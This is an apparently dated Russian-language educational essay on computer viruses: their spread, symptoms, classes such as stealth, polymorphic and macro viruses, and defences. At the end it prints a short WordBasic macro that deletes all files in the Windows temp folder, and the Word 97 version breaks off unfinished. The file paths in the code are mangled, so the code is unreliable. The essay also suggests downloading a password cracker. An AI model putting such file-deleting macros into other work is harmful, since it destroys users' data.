| |
Введение
Компьютерные
вирусы.
Компьютерные
вирусы — это одна из наиболее широко
известных опасное для сетей. Подобно
живым микроорганизмам, они распространяются,
заражая здоровые программы. Заразив систему,
они проникают в каждый исполняемый или
объектный файл, размещенный на машине.
Более того, некоторые вирусы заражают
загрузочные сектора дисков, а это значит,
что вирус проникнет и в машины, загружающиеся
с зараженного диска. Мы постараемся рассмотреть
компьютерные вирусах и методы борьбы
с ними. Любой вирус внедряет свой код
в тело программы. Благодаря этому он будет
выполняться при каждом ее запуске Большинство
вирусов распространяется с помощью дискет.
В настоящее время имеется около тысячи
видов вирусов. Учитывая тот факт, что
каждый из них существует в нескольких
модификациях, нужно увеличить это число
в 5—10 раз Большинство вирусов распространяется
одним из двух методов: заражая файлы или
загрузочные сектора.
Файлы данных не могут быть заражены вирусом.
Однако существуют так называемые макровирусы,
которые распространяются с помощью файлов
шаблонов.
В Internet существует значительное количество
«мнимых» вирусов.
Защититься от вирусов не так уж сложно.
Итак, что же такое вирус?
1. Вирус и способы
его распространения.
Исторически
вирусом называется любая программа, заражающая
выполняемые или объектные файлы. Программу,
воспроизводящую себя без ведома пользователя,
также можно отнести к вирусам. Чаще всего
вирус помещает свое тело в программном
файле так, чтобы он активизировался при
каждом запуске программы. Кроме того,
вирусы могут поражать загрузочный сектор
жесткого или флоппи-диска, помещенного
в дисковод зараженного компьютера. Перенос
своего тела на дискеты и жесткие диски
является для вируса гарантией того, что
он будет запущен при каждом включении
системы.
Большинство
вирусов инфицируют файлы путем переноса
своего тела внутрь жертвы. Однако в связи
с созданием все более искусных антивирусных
программ, разработчики вирусов изменили
стратегию. Теперь, прежде чем заразить
очередной файл, вирус изменяет свое тело.
Выбрав жертву, вирус копирует себя из
памяти компьютера внутрь заражаемого
файла. Процесс заражения файла практически
одинаков у всех вирусов. Например, простейшие
вирусы заражают файлы следующим образом:
1. Прежде всего, пользователь должен загрузить
зараженный файл в память компьютера.
Этот файл может попасть в компьютер с
помощью флоппи-диска, локальной сети
или через Internet. После его запуска вирус
копирует себя в память компьютера
2. Разместившись в памяти, вирус ожидает
загрузки следующей программы. Не правда
ли, это очень напоминает поведение живых
микроорганизмов, ожидающих появления
нового "хозяина".
3. После запуска следующей программы вирус
помещает свое тело внутрь жертвы. Кроме
того, вирус помещает свое тело и внутри
копии программы, хранящейся на диске.
4. Вирус продолжает заражать программы
до тех пор, пока не заразит их все или
пока пользователь не выключит компьютер.
Тогда расположенный в его памяти вирус
пропадает. Однако для него это не так
уж и страшно - ведь он расположен внутри
зараженных файлов, хранимых на диске.
5. После включения компьютера и загрузки
зараженной программы вирус снова начинает
свою "невидимую" жизнь в памяти системы.
И так до бесконечности. Приведенная выше
модель работы вируса упрощена. На самом
деле существуют и такие вирусы, которые
сохраняются на жестком диске так, чтобы
быть загруженными в память при каждом
запуске операционной системы. Некоторые
вирусы умеют прятаться внутри сжатых
файлов. Более того, некоторые вирусы умеют
заражать системы с помощью текстового
процессора. Однако важно уяснить, что
вирус заражает машину только в том случае,
если вы запускаете инфицированную программу.
Даже вирусы, паразитирующие на текстовых
процессорах, для своей активизации требуют
выполнения специальной программы - макрокоманды.
2.Основные симптомы
заражения вирусом
Некоторые вирусы
не могут быть обнаружены даже самыми
лучшими антивирусными программами. В
качестве дополнительных средств защиты
нужно поставить грамотность пользователя.
Необходимо знать, как выявить зараженную
машину.
Приведем список
общих признаков заражения:
1.Программы стали загружаться медленнее;
2.Файлы появляются или исчезают;
3.Размеры программы или объекта изменяются
по непонятным причинам;
4.На экране появляется необычный текст
или изображения;
5.Элементы экрана выглядят нечеткими,
размытыми;
6.Сам по себе уменьшается объем свободного
места на жестком диске;
7.Команды CHKPSK и SCANDISK возвращают некорректные
значения;
8.Имена файлов изменяются без видимых
причин;
9.Нажатия клавиш сопровождаются странными
звуками;
10.Доступ к жесткому диску запрещен;
3.Разнообразие
компьютерных вирусов
Существует
несколько различных классов (или
типов) вирусов. Вирусы каждого из классов
используют различные методы воспроизведения.
К наиболее известным классам
относятся троянские кони, полиморфные
вирусы и неполиморфные шифрующиеся
вирусы, стелс-вирусы, медленные вирусы,
ретро-вирусы, составные вирусы, вооруженные
вирусы, вирусы-фаги и макровирусы. Далее
мы подробно рассмотрим каждый из них.
Компьютерные вирусы - это не выдумка.
Специалисты утверждают, что только пять
процентов всех вирусов могут вызвать
серьезные неполадки в аппаратном обеспечении
или крах операционной системы. Но, несмотря
на это они все же могут представлять очень
серьезную опасность для компьютера. Большинство
"электронных инфекций" только тем
и занимается, что воспроизводит себя.
Их главная задача - выжить, а не нанести
вред системе. Однако это совсем не значит,
что нужно забыть об их существовании.
Важно помнить: "безобидных" вирусов
не существует.
Подобно комарам, компьютерные вирусы,
кажется, будут досаждать нам вечно. Поэтому
стоит познакомиться с ними поближе и
научиться отличать настоящий вирус от
неполадок в системе. Запомните одну несложную
истину: с вирусами можно и нужно бороться.
Большая часть литературы, посвященной
антивирусному программному обеспечению,
запугивает простых пользователей "десятками
тысяч" компьютерных вирусов, странствующих
по Internet. На самом деле их количество не
превышает тысячи. Дело в том, что разработчики
считают каждую модификацию одного и того
же вируса новым вирусом. Благодаря этому
наша тысяча разрастается до "десятков
тысяч". Дополним все вышесказанное
одним небольшим примером. Компьютерный;
-вирус Marijuana первоначально выводил на
экране слово "legalise". (В английском
языке это слово выглядит как "legalize"
[узаконивать, легализировать]. - Прим,
перев.) Затем автор вируса исправил свою
ошибку, и вирус начал выводить на экран
слово "legalize". При этом текст вируса
абсолютно не изменялся. Однако разработчики
антивирусов посчитали исправленный вирус
за абсолютно новый. Благодаря этому они
могут смело говорить о "тысячах и тысячах"
существующих вирусов.
В Web расположено несколько сайтов с прекрасной
информацией о компьютерных вирусах. Одним
из них является сайт Joe Wells' WildLists, расположенный
по адресу http://www.virusbtn.com/WildLists/. Бывший работник
корпорации Symantec Джо Уэллс (сейчас он работает
консультантом в компании IBM) включил в
эти списки Все наиболее распространенные
в настоящее время вирусы. Ассоциация
NCSA (National Computer Security Association) использует списки
Уэллса для оценки качества антивирусных
программ. Чтобы удовлетворить запросам
NCSA, программа должна обнаруживать все
перечисленные в этом списке вирусы. Отметим,
что этот список обновляется каждый месяц.
4. Связанные с
вирусами опасности.
При разработке
антивирусной стратегии компании следует
помнить, что большинство вирусов
не распространяется с помощью Internet.
Наоборот, основными путями распространения
вирусов являются продаваемое программное
обеспечение, системы электронной
почты в изолированных и университетских
локальных сетях, а также дискеты,
используемые служащими в их домашних
компьютерах. Многие компании, предоставляющие
пробные версии своих программ, тщательно
проверяют копии на наличие вирусов.
С другой стороны, известны сотни
случаев, когда продавцы-посредники
поставляли своим клиентам зараженные
диски. Если учесть все типы программ,
которые могут быть заражены вирусами,
то количество пострадавших таким образом
покупателей составляет сотни тысяч.
Кроме того, существует опасность
заражения машины через программное
обеспечение, поставляемое вашим местным
продавцом ПО. Такие продавцы обычно
не проверяют дискеты на наличие вирусов.
Вся их работа заключается в перемещении
дискет основного поставщика в свои фирменные
упаковки. Если же кто-то уже использовал
эти дискеты на зараженном компьютере,
то с большой долей вероятности можно
утверждать, что эти диски уже заражены.
Чтобы избежать подобных проблем, многие
компании (включая и Microsoft) начали запаковывать
отдельные дискеты и только затем помещать
их в коробки. Хозяева сайтов, электронных
досок объявлений, а также авторы программного
обеспечения не желают потерять свое место
под солнцем из-за каких-то вирусов. Поэтому
любой разработчик Web-сайта (Web-master), желающий
и дальше иметь прибыль от своей работы,
должен тщательно проверять каждый файл
на наличие троянских коней, стелс-вирусов
и т. д. Конечно же, это ни в коей мере не
освобождает вас от проверки программ,
загружаемых с помощью Internet. Однако еще
раз напомним, что большинство вирусов
поступает через дискеты, поэтому необходимо
уделять основное внимание их проверке.
Стоит все же отметить, что в последнее
время возросло количество вирусов, распространяемых
с помощью Internet. Немалую роль в этом сыграло
и открытие макровирусов.
5.Вирусы и электронная почта.
Корпоративные
системы электронной почты доставляют
много хлопот системным администраторам.
Приведуем следующий пример. Не так давно
появился один из самых известных "мнимых"
вирусов - вирус Good Times. Предполагалось,
что он распространяется с помощью сообщений
электронной почты. Вирусу приписывались
самые невероятные способности. В частности,
указывалось, что он "...разрушает центральный
процессор с помощью использования бесконечного
цикла n-ой степени сложности". Так как
многие пользователи не понимают, как
распространяются вирусы, то вирус Good
Times довольно скоро стал известен во всем
мире. На самом деле обычные текстовые
сообщения электронной почты не могут
содержать никаких вирусов. Дело в том,
что текстовые сообщения относятся к файлам
данных, которые не являются программами
и не могут выполняться на машине. Как
мы помним, вирусы могут заражать только
исполняемые программы (не считая макровирусов).
То же самое можно сказать практически
обо всех сообщениях электронной почты.
Однако уже случались такие ситуации,
когда файл с данными на самом деле оказывался
исполняемым файлом. Некоторые Web-броузеры
и диалоговые служебные программы (вроде
America Online) выполняют программы сразу после
их загрузки.
Гораздо чаще пользователям приходится
иметь дело с "пересылкой файлов данных
текстовых процессоров (например, документы
Microsoft Word). Однако благодаря недавним разработкам
в области текстовых процессоров эти файлы
перестали быть просто файлами данных.
В большинстве случаев такие файлы содержат
внедренные макрокоманды, с помощью которых
можно существенно ускорить работу. На
самом деле макрокоманда является некоторой
разновидностью программ. Благодаря этому
стало возможным создание макровирусов.
Макровирус
-это макрокоманда, которая воспроизводит
себя в каждом новом документе. Большинство
современных макровирусов не представляют
собой большой опасности. Однако потенциально
они обладают огромными возможностями.
Дело в том, что макрокоманды обладают
доступом к набору операций, с помощью
которых можно производить различные
(в том числе и разрушительные) действия
в системе. Например, с помощью макрокоманды
можно удалить с жесткого диска системные
файлы.
Наилучшим методом защиты от вирусов,
передаваемых с помощью электронной почты,
является установка на каждом компьютере
надежного антивирусного программного
обеспечения. Для защиты от макровирусов,
возможно, понадобится пересмотреть стратегию
защиты.
6.Создание вируса
для исполняемого файла.
В этом разделе
я расскажу о том, как вирус может заразить
исполняемый файл и как создатели вирусов
могут защитить их от обнаружения.Практически
у каждого создателя вирусов есть свой
собственный, оригинальный метод заражения
ЕХЕ-файлов. Расскажем о наиболее простом
методе. Прежде всего вирус создает в памяти
дополнительную область для своего размещения.
После этого он прочитывает заголовок
ЕХЕ-файла и переделывает его так, чтобы
он содержал информацию и о месте в памяти,
занимаемом вирусом. С этого момента и
начинается процесс заражения программы.
Приведем действия вируса, проникшего
в ЕХЕ-файл:
1. Вирус считывает текущий заголовок файла
и сохраняет его для дальнейшего использования.
В этом заголовке хранится информация
о длине файла, значении контрольной суммы
и т.д.
2. После этого вирус определяет, какое
количество памяти он должен прибавить
к текущему размеру файла, чтобы разместить
там свое тело.
3. Вирус копирует свое тело в файл. Размер
вируса и внесенных им изменений в заголовок
файла составляют сигнатуру вируса.
4. Вирус снова записывает информацию заголовка
в программу. Теперь заголовок содержит
информацию о месте, занимаемом вирусом.
5. Вирус сохраняет измененную программу
на диске,
Описанный выше тип вирусов называется
вирусом-паразитом. Вирус-паразит добавляет
свое тело к программе и после этого продолжает
свою жизнь наравне с программой. Если
же вы удалите инфицированный файл, то
вместе с ним исчезнет и вирус. Кроме вирусов-паразитов
существуют так называемые загрузочные
вирусы, размещающие свое тело в подпрограмме
загрузки операционной системы. Этот тип
вирусов совершенно отличен от вирусов-паразитов.
Дело в том, что загрузочные вирусы паразитируют
не на исполняемых программах, а на самой
операционной системе.
7.Виды вирусов
Как уже говорилось,
наиболее распространенными являются
троянские кони, полиморфные вирусы и
неполиморфные шифрующиеся вирусы, стелс-вирусы,
медленные вирусы, ретро-вирусы, составные
вирусы, вооруженные вирусы, вирусы-фаги
и макровирусы. Каждый из них производит
некоторые специфические действия.
Троянские кони
Троянскими конями называются вирусы,
прячущиеся в файлах данных (например,
сжатых файлах или документах). Чтобы избежать
обнаружения, некоторые разновидности
троянских коней прячутся и в исполняемых
файлах. Таким образом, эта программа может
располагаться и в программных файлах,
и в файлах библиотек, пришедших в сжатом
виде. Однако зачастую троянские кони
содержат только подпрограммы вируса.
Возможно, самое лучшее определение троянских
коней дал Дэн Эдварде - бывший хакер, занимающийся
теперь разработкой антивирусного программного
обеспечения для NSA (National Security Administration).
По словам Дэна, троянским конем называется
"небезопасная программа, скрывающаяся
под видом безобидного приложения, вроде
архиватора, игры или (знаменитый случай
1990 года) программы обнаружения и уничтожения
вирусов". Большинство новых антивирусных
программ обнаруживает практически всех
троянских коней.
Одной из наиболее известных "троянских
лошадок" стала программа Crackerjack. Как
и все другие средства для взлома паролей,
доступные в Internet, эта программа тестировала
относительную мощность паролей, расположенных
в выбранном файле. После своего запуска
она выдавала список взломанных паролей
и предлагала пользователю удалить этот
файл. Первая версия программы не только
взламывала пароли, но также и передавала
их автору троянского коня. Crackerjack оказался
достаточно полезным средством, в чем
вы можете убедиться сами. Для этого достаточно
загрузить программу из Internet.
Полиморфные вирусы
Полиморфные вирусы - это вирусы, которые
зашифровывают свое тело и благодаря этому
могут избежать обнаружения путем проверки
сигнатуры вируса. Прежде чем приступить
к работе, такой вирус расшифровывает
себя с помощью специальной процедуры
расшифровки. Процедура расшифровки превращает
зашифрованную информацию в обычную. Чтобы
расшифровать тело вируса, процедура расшифровки
захватывает управление машиной. После
расшифровки управление компьютером передается
расшифрованному вирусу. Первые шифрующиеся
вирусы были неполиморфными. Другими словами,
процедура расшифровки вируса не изменялась
от копии к копии. Поэтому антивирусные
программы могли обнаружить вирус по сигнатуре,
присущей процедуре расшифровки. Но вскоре
ситуация изменилась коренным образом.
Полиморфные вирусы обнаружить очень
трудно. Дело в том, что они генерируют
абсолютно новые процедуры расшифровки
при каждом новом заражении. Благодаря
этому сигнатура вируса изменяется от
файла к файлу. Для изменения процедуры
шифрования используется достаточно простой
генератор машинного кода, называющийся
генератором мутаций. Он использует генератор
случайных чисел и достаточно простой
алгоритм изменения сигнатуры вируса.
С его помощью программист может превратить
любой вирус в полиморфный. Для этого он
должен изменить текст вируса так, чтобы
перед каждым созданием своей копии он
вызывал генератор мутаций.
Несмотря на то, что полиморфные вирусы
нельзя обнаружить с помощью обычных методов
проверки (вроде сравнения строк кода),
они все же детектируются специальными
антивирусными программами. Итак, полиморфные
вирусы можно обнаружить. Однако этот
процесс занимает огромное количество
времени, а на создание антивирусной программы
уходит гораздо больше сил. Наиболее свежие
обновления антивирусного программного
обеспечения производят поиск процедур
шифрования, с помощью которой, обнаруживают
полиморфные вирусы. Полиморфный вирус
изменяет свою сигнатуру при создании
очередной копии, от файла к файлу.
Стелс-вирусы
Стелс-вирусы - это вирусы, которые прячут
изменения, созданные в зараженном файле.
Для этого они отслеживают системные функции
чтения файлов или секторов на носителях
информации. Если происходит вызов такой
функции, то вирус старается изменить
полученные ею результаты: вместо настоящей
информации вирус передает функции данные
незараженного файла. Таким образом, антивирусная
программа не может обнаружить никаких
изменений в файле. Но, для того чтобы перехватывать
системные вызовы, вирус должен находиться
в памяти машины. Все достаточно хорошие
антивирусные программы могут обнаружить
подобные вирусы во время загрузки зараженной
программы. Хорошим примером стелс-вируса
является один из первых задокументированных
вирусов DOS - Brain. Этот загрузочный вирус
просматривал все дисковые системные
операции ввода/вывода и перенаправлял
вызов всякий раз, когда система пыталась
считать зараженный загрузочный сектор.
При этом система считывала информацию
не с загрузочного сектора, а с того места,
где вирус сохранил копию этого сектора.
Стелс-вирусами также являются вирусы
Number, Beast и Frodo. Говоря языком программистов,
они перехватывают прерывание 21Н -основное
прерывание DOS. Поэтому всякая команда
пользователя, способная обнаружить присутствие
вируса, перенаправляется вирусом в определенное
место в памяти. Благодаря этому пользователь
не может "заметить" вирус. Как правило,
стелс-вирусы, либо обладают невидимым
размером, либо они невидимы для чтения.
Вирусы с невидимым размером принадлежат
к подвиду вирусов, заражающих файлы. Такие
вирусы помешают свое тело внутрь файла,
вызывая тем самым увеличение его размера.
Однако вирус изменяет информацию о раз-
мере файла так, чтобы пользователь не
мог обнаружить его присутствия. Другими
словами, система указывает на то, что
длина зараженного файла равняется длине
обычного «незараженного» файла. Вирусы,
невидимые для чтения (вроде Stoned.Monkey), перехватывают
запросы на чтение зараженной загрузочной
записи или файла и предоставляют в ответ
первоначальную, не измененную вирусом
информацию. И снова пользователь не может
обнаружить присутствие вируса. Стелс-вирусы
достаточно легко обнаружить. Большинство
стандартных антивирусных программ "вылавливают"
стелс-вирусы. Для этого достаточно запустить
антивирусную программу до того, как вирус
будет размещен в памяти машины. Надо запустить
компьютер с чистой загрузочной дискеты,
а затем выполнить антивирусную программу.
Как уже говорилось, стелс-вирусы могут
замаскироваться только в том случае,
если они уже размещены в памяти. Если
же это не так, то антивирусная программа
легко обнаружит наличие таких вирусов
на жестком диске.
Медленные вирусы
Медленные вирусы очень трудно обнаружить,
так как они заражают только те файлы,
которые изменяются или копируются операционной
системой. Другими словами, медленный
вирус заражает любой исполняемый файл,
причем делает это в тот момент, когда
пользователь выполняет некоторые операции
с этим файлом. Например, медленный вирус
может производить заражение загрузочной
записи дискеты при выполнении команд
системы, изменяющих эту запись (например,
FORMAT или SYS). Медленный вирус может заразить
копию файла, не заразив при этом файл-источник.
Одним из наиболее известных медленных
вирусов является Darth_Vader, который заражает
только СОМ-файлы и только во время их
записи.
Обнаружение медленных вирусов - это достаточно
сложный процесс. Хранитель целостности
должен обнаружить новый файл и сообщить
пользователю о том, что у этого файла
нет значения контрольной суммы. Хранитель
целостности - это антивирусная программа,
наблюдающая за содержанием жестких дисков,
а также за размером и контрольной суммой
каждого из расположенных на них файлов.
Если хранитель обнаружит изменения в
содержании или размере, то он немедленно
сообщит об этом пользователю. Однако
сообщение будет выдано и в том случае,
если пользователь сам создаст новый файл.
Поэтому пользователь, скорее, укажет
хранителю целостности вычислить новую
контрольную сумму для нового «инфицированного»
файла.
Наиболее удачным средством против медленных
вирусов являются оболочки целостности.
Оболочки целостности - это резидентные
хранители целостности. Они постоянно
находятся в памяти компьютера и наблюдают
за созданием каждого нового файла, и у
вируса не остается практически никаких
шансов. Еще одним способом проверки целостности
является создание ловушек. Здесь специальная
антивирусная программа создает несколько
СОМ- и ЕХЕ-файлов определенного содержания.
Затем программа проверяет содержимое
этих файлов. Если медленный вирус заразит
их, то пользователь сразу же узнает об
этом. Например, медленный вирус может
наблюдать за программой копирования
файлов. Если DOS выполняет запрос на копирование,
то вирус поместит свое тело в новую копию
файла.
Ретро-вирусы.
Ретро-вирус - это вирус, который пытается
обойти или помешать действиям антивирусных
программ. Другими словами, эти вирусы
атакуют антивирусное программное обеспечение.
Компьютерные профессионалы называют
ретро-вирусы анти-антивирусами. (Не спутайте
анти-антивирусы с анти-вирус-вирусами
- вирусами, созданными для уничтожения
других вирусов.) Создание ретро-вируса
является относительно несложной задачей.
В конце концов, создатели вирусов обладают
доступом ко всем антивирусным программам.
Приобретая такую программу, они изучают
ее работу, находят бреши в обороне и после
этого создают вирус на основе обнаруженных
просчетов. Большинство ретро-вирусов
занимается поисками и удалением файлов
с данными о сигнатурах вирусов. Таким
образом, антивирусная программа, использовавшая
этот файл, не может больше нормально функционировать.
Более сложные ретровирусы занимаются
поиском и удалением баз данных, содержащих
информацию о целостности файлов. Удаление
подобной базы производит на хранителя
целостности такой же эффект, как уничтожение
файлов с сигнатурами вирусов на антивирусную
программу. Многие ретро-вирусы обнаруживают
активизацию антивирусных программ, а
затем прячутся от программы либо останавливают
ее выполнение. Кроме того, они могут запустить
процедуру разрушения до того, как антивирусная
программа обнаружит их присутствие. Некоторые
ретро-вирусы изменяют оболочку вычислений
антивируса и таким образом влияют на
выполнение антивирусных программ. Кроме
того, существуют ретро-вирусы, использующие
недостатки антивирусного программного
обеспечения, чтобы замедлить его работу
или свести на нет эффективность программы.
Составные вирусы.
Составные вирусы заражают как исполняемые
файлы, так и загрузочные сектора дисков.
Кроме того, они могут заражать загрузочные
сектора дискет. Такое название они получили
потому, что заражают компьютер различными
путями. Другими словами, они не ограничиваются
одним типом файлов или определенным местом
на диске. Если запустить инфицированную
программу, вирус заразит загрузочную
запись жесткого диска. При следующем
включении машины вирус активизируется
и будет заражать все запущенные программы.
Одним из наиболее известных составных
вирусов является One-Half, который обладает
признаками стелс-вируса и полиморфного
вируса.
Вооруженные вирусы
Вооруженные вирусы защищают себя с помощью
специального кода, благодаря которому
сильно усложняется отслеживание и дизассемблирование
вируса. Вооруженные вирусы могут воспользоваться
для защиты "пустышкой". Это - код,
позволяющий увести разработчика антивирусных
программ от настоящего кода вируса. Кроме
того, вирус может включать в себя специальный
фрагмент, указывающий на то, что вирус
расположен в одном месте, хотя на самом
деле его там не будет. Одним из наиболее
известных вооруженных вирусов является
Whale.
Вирусы- компаньоны
Свое название эти вирусы получили потому,
что параллельно с заражаемым файлом они
создают файл с таким же именем, но с другим
расширением. Например, вирус-компаньон
может сохранить свое тело в файле winword.com.
Благодаря этому операционная система
перед каждым запуском файла winword.exe будет
запускать файл winword.com, который будет располагаться
в памяти компьютера. Обычно вирусы-компаньоны
генерируются вирусами-фагами.
Вирусы-фаги
Последним классическим типом вирусов
являются вирусы-фаги. Вирус-фаг - это программа,
которая изменяет другие программы или
базы данных. Компьютерные профессионалы
называют эти вирусы фагами потому, что
по своему действию они напоминают живые
микроорганизмы. В природе вирусы-фаги
представляют собой особенно вредные
микроорганизмы, которые замещают содержимое
клетки своим собственным. Обычно фаги
замещают текст программы своим собственным
кодом. Чаще всего они являются генераторами
вирусов компаньонов. Фаги - это наиболее
опасный вид вирусов. Дело в том, что они
не только размножаются и заражают другие
программы, но и стремятся уничтожить
все зараженные программы.
Черви
знаменитый червь Internet, появившемся в
конце 80-х годов. (известный также как червь
Морриса) был самым первым вирусом, поразившим
Internet. Этот вирус делал невозможной работу
компьютера, создавая огромное количество
своих копий в памяти компьютера. Так как
червь старается остановить зараженный
компьютер, создатель вируса должен наделить
его способностями перемещаться с помощью
сети от одной машины к другой. Черви копируют
себя на другие компьютеры с помощью протоколов
и систем. Удаленное воспроизведение необходимо,
так как после остановки машины пользователь
постарается вычистить все имеющиеся
на жестком диске вирусы. Для своего распространения
вирусам-червям не требуется изменять
программы хоста. Для нормальной работы
червям необходимы операционные системы,
обеспечивающие возможность удаленного
выполнения и позволяющие приходящим
программам выполняться на компьютере.
В 1988 году такими возможностями обладала
только одна операционная система - Unix.
До недавнего времени многие персональные
компьютеры не могли быть заражены червем
- этого не позволяют сделать ни DOS, ни Windows
95. Однако Windows NT уже обладает возможностями
удаленного выполнения и поэтому может
поддерживать работу вирусов-
червей.
Одним из самых распространенных вирусов
в Internet является WINSTART. Свое название он
получил от имени файла - winstart.bat, - в котором
обычно и располагается тело вируса. Этот
червь, как и многие остальные, копирует
себя в памяти машины до тех пор, пока не
будет выведена из строя операционная
система. После этого компьютер автоматически
зависает. Во время своего выполнения
вирус параллельно занимается поиском
следующей жертвы. По иронии судьбы червем
называется не только определенный тип
вирусов, но и очень полезное антивирусное
инструментальное средство. Недостаток
большинства стандартных средств аудита
и хранителей целостности заключается
в том, что они также могут стать жертвами
вирусов. Однако можно хранить информацию
безопасности и программы на изолированном
и неизменяемом носителе. Наиболее подходят
для этих целей WORM-диски. ("Write-once, read-many"
-одна запись, многоразовое чтение; английское
слово worm переводится как червь. - Прим.
перев.). Привод WORM-диска обычно представляет
собой приспособление оптического хранения
данных, работающее с несколькими WORM-дисками.
Вирусы и сети.
Файловые вирусы и макровирусы - вот два
наиболее опасных типа вирусов. Именно
с ними приходится иметь дело администраторам
сетевых серверов и одноранговых сетей,
соединенных с Internet. Загрузочные вирусы
обычно не распространяются по Internet, так
как соединенный с Internet компьютер не может
произвести на другом компьютере дисковые
операции низкого уровня. Другими словами,
сервер Internet обычно не может записывать
файлы на другой компьютер. Такую операцию
в состоянии произвести только компьютер-получатель.
К числу файловых вирусов и макровирусов
относятся многие вирусы, описанные ранее.
Файловые вирусы
Файловым вирусом может быть троянский
конь, вооруженный вирус, стелс-вирус и
некоторые другие. Файловые вирусы опасны
для данных, хранящихся на сервере, одноранговых
сетей и, в какой-то степени, Internet. Далее
приводятся три пути заражения сетевого
сервера: Копирование (пользователем или
администратором) зараженных файлов прямо
на сервер. После этого вирус, расположившийся
в файле, начнет заражать все остальные
файлы. Выполнение файлового вируса на
рабочей станции может заразить сеть.
После своего запуска вирус сможет заразить
любое приложение, хранимое на сервере.
Если же вирус сумеет проникнуть в какой-либо
файл, расположенный на сервере, то он
сможет заразить и все машины в сети. Выполнение
резидентного вируса на рабочей станции
может вызвать заражение всей сети. После
своего запуска резидентный вирус может
получить информацию о передаваемых данных
и скопировать себя на сервер, не обладая
при этом прямым доступом к расположенной
на сервере информации.
Абсолютно не важно, как вирус попадет
в сеть. Он может быть размещен на дискете,
получен с сообщением электронной почты
или загружен из Internet вместе с исполняемым
файлом. Как только вирус попадает на компьютер,
обладающий доступом к другим сетевым
компьютерам, то он способен заразить
все остальные машины. Заразив всего лишь
одну машину в сети, вирус начнет свое
"шествие" по всей сети и в конце концов
попадет на сервер.
После заражения файлового сервера любой
пользователь, запустивший зараженную
программу, может заразить файлы на своем
жестком диске или другие файлы, размещенные
на том же сервере. Кроме того, администратор,
зарегистрировавшийся в сети с правами
суперпользователя, может обойти запреты
на доступ к файлам и каталогам и заразить
еще большее количество файлов. Серверы
это очень удобное для вирусов место. Дело
в том, что при загрузке сервер размещает
в памяти достаточно большое количество
сетевых приложений. Зараженный сервер
становится носителем исполняемых файловых
вирусов. Вирусы не размножаются на сервере
и не портят его программ. Они переносятся
лишь в том случае, если пользователь загрузит
зараженную программу на свою рабочую
станцию. До сих пор не зарегистрировано
ни одного вируса, способного внедриться
в программное обеспечение сервера и заражать
файлы во время чтения или записи на сервер.
Однако технологии создания вирусов не
стоят на месте, и, возможно, скоро появится
именно такой тип вирусов. Одноранговые
сети еще более подвержены атакам файловых
вирусов. Дело в том, что средства безопасности
одноранговой сети очень слабы (если не
сказать больше). Кроме того, архитектура
такой сети (каждая машина одновременно
является и сервером, и рабочей станцией)
делает машины еще более уязвимыми.
Отметим также, что Internet не является "инкубатором"
для вирусов. "Сеть сетей" также является
носителем "компьютерных инфекций".
Файловые вирусы не могут размножаться
в Internet и заражать удаленные машины. Чтобы
произошло заражение, компьютер должен
загрузить зараженный файл из сети и запустить
его.
Макровирусы
Макровирусы - это один из наиболее опасных
типов компьютерных вирусов. В настоящее
время они представляют собой наиболее
быстро развивающуюся разновидность "компьютерных
инфекций", способных перемещаться
посредством Internet. Макровирусы представляют
опасность не только для сетей, но и для
автономных компьютеров, т. к. они не зависят
от компьютерной платформы и от конкретной
операционной системы. Более того, эти
вирусы заражают не исполняемые файлы,
а файлы с данными, которых гораздо больше.
Количество макровирусов растет с каждым
днем. По официальным данным, в октябре
1996 года было зарегистрировано менее 100
макровирусов. В мае 1997 года их количество
достигло 700. Как вы узнаете, макровирус
- это небольшая программа, написанная
на внутреннем языке программирования
(иногда эти языки называют языками разработки
сценариев или макроязыками) какого-то
приложения. В качестве таких приложений
обычно выступают текстовые или табличные
процессоры, а также графические пакеты.
Обычно макровирусы распространяются
путем создания копий в каждом новом документе.
Таким образом макровирус может попадать
на другие машины вместе с зараженными
документами. Наиболее часто макровирусы
удаляют файлы так, чтобы впоследствии
их нельзя было восстановить. Макровирусы
могут выполняться на любом типе компьютеров.
Главное, чтобы на машине была нужная им
программа обработки документов вместе
со своим внутренним языком программирования.
Именно благодаря этому языку макровирусы
могут выполняться на различных платформах
и под управлением различных операционных
систем.
Внутренние языки программирования наиболее
популярных приложений представляют собой
очень эффективное инструментальное средство.
С их помощью можно удалять или переименовывать
файлы и каталоги, а также изменять содержимое
файлов. Созданные на таких языках программирования
макровирусы могут проделывать те же самые
операции.
В настоящее время большинство известных
макровирусов написано на Microsoft Word Basic
или недавно появившемся Visual Basic for Application
(VBA); WordBasic - это внутренний язык программирования
текстового процессора Word for Windows (начиная
с версии 6.0) и Word 6.0 for Macintosh. Так как при
каждом использовании программы из пакета
Microsoft Office выполняется и VBA, то написанные
с его помощью макровирусы представляют
для системы чрезвычайную опасность.
Другими словами, макровирус, созданный
с помощью VBA, может заражать и таблицы
Excel, и базы данных Access, и презентации PowerPoint.
С ростом возможностей внутренних языков
программирования возрастет и количество
новых макровирусов.
Далее приводится список наиболее важных
причин создания вирусов с применением
Microsoft Word:
Microsoft Word обладает огромными возможностями,
благодаря которым макровирус может производить
различные действия. Кроме того, созданы
версии этой программы для различных компьютерных
платформ: существуют версии для DOS, Windows
3.1, Windows 95 и Mac OS. Это увеличивает поле деятельности
макровирусов.
Общий шаблон (в Windows он хранится в файле
normal.dot) содержит глобальные макрокоманды,
всегда доступные в Microsoft Word. Для макровируса
этот файл представляет собой "плодородную
почву". Дело в том, что именно в этом
шаблоне обычно и размещается тело макровируса.
Именно из него вирус заражает все созданные
в текстовом процессоре документы.
Microsoft Word автоматически выполняет указанные
макрокоманды без участия пользователя.
Благодаря этому макровирус может выполняться
вместе с обычными макрокомандами (с помощью
обычных макрокоманд программа производит
открытие и закрытие документа, а также
завершение своей работы).
По сравнению с созданием системных вирусов
с помощью ассемблера, написать макровирус
не так уж сложно. WordBasic и VBA представляют
собой достаточно простые языки программирования.Обычно
пользователи помещают документы Word в
сообщения электронной почты, в листы
рассылки и тд. Все это способствует еще
более быстрому распространению макровирусов.
Пример макровируса.
Как уже говорилось, создание макровирусов
- это достаточо простая задача. Чтобы
вы лучше представили ситуацию, я приведу
конкретный пример макровируса. Первый
из них - DeleteAHTemp - выполняется в Word 6.0шт
Word 7.0. Его цель - удалить все файлы, расположенные
в каталоге windows/temp.
Sub MAIN
ChDir "c:windows emp"
Temp$ = Files$("*.*")
While Temp$ <> ""
Kill Temp$
Temp$ = Files$()
Wend
End Sub
Чтобы создать такую же макрокоманду в
Word 97, нужно слегка изменить текст программы:
Sub DeleteAllTemp()
Макрос DeleteAllTemp
ChDir "с: mp2121"
Temp$ = Dir("*.*")
Do While Temp$ <> ""
